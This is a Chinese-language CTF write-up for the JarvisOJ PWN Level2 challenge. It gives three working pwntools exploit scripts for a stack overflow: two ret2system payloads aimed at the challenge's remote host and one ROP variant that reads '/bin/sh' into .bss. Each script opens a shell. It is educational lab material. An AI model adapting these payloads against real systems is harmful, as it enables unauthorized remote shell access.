JarvisOJ-PWN-Level2
IDA打开,稍微分析下发现其和level1大致一样,都是利用read栈溢出。
shift+12查看字符串
看到/bin/sh
双击得到地址:
再看到这个:
那么就是要传参数到system()里了。
所以构造代码如下:
# -*- coding:utf-8 -*-
from pwn import *
# sh = process('./level2') # local
sh = remote('pwn2.jarvisoj.com', 9878) # remote
padd = 'a'*(0x88+4)
system_ad = p32(0x08048320)
bin_sh = p32(0x804a024)
payload = padd+system_ad+'a'*4+bin_sh#跳到system地址,返回地址为0xaaaa,参数为/bin/sh
sh.sendline(payload)
sh.interactive()
如果不知道system的话也可以用elf模块查看:
# -*- coding:utf-8 -*-
from pwn import *
# sh = process('./level2') # local
sh = remote('pwn2.jarvisoj.com', 9878) # remote
level2 = ELF('./level2')
padd = 'a'*(0x88+4)
system_ad = p32(level2.plt['system'])
bin_sh =p32(0x804a024)
payload = padd+system_ad+'a'*4+bin_sh
sh.sendline(payload)
sh.interactive()
或者也可以用pop pop pop ,参考文章
http://blog.csdn.net/linyt/article/details/48738757
http://blog.csdn.net/swartz_lubel/article/details/54972511
from pwn import *
sh = process('./level2')
level2 = ELF('./level2')
bss = level2.bss()+1#0x804a024
print hex(bss)
padding = 'a'*(0x88+4)
read_addr = p32(level2.plt['read'])
rop = p32(0x08048519)#rop rop rop ret
argv = p32(0)+p32(bss)+p32(10)#这里第三个参数一定要大于/bin/sh\x00长度
system_addr = p32(level2.plt['system'])
argv_r = p32(bss)#p32(0x804a024)
payload = padding+read_addr+rop+argv+system_addr+'a'*4+argv_r
sh.sendline(payload)
# time.sleep(0.2)
sh.send('/bin/sh\x00')
sh.interactive()
参考文章:
http://blog.csdn.net/linyt/article/details/48738757
http://blog.csdn.net/swartz_lubel/article/details/54972511
http://jaq.alibaba.com/community/art/show?spm=a313e.7916646.24000001.11.MtR4jX&articleid=403
http://blog.csdn.net/qq_31481187/article/details/53189113#0x04-xmanlevel2
http://www.mamicode.com/info-detail-1971189.html
https://jaq.alibaba.com/community/art/show?articleid=473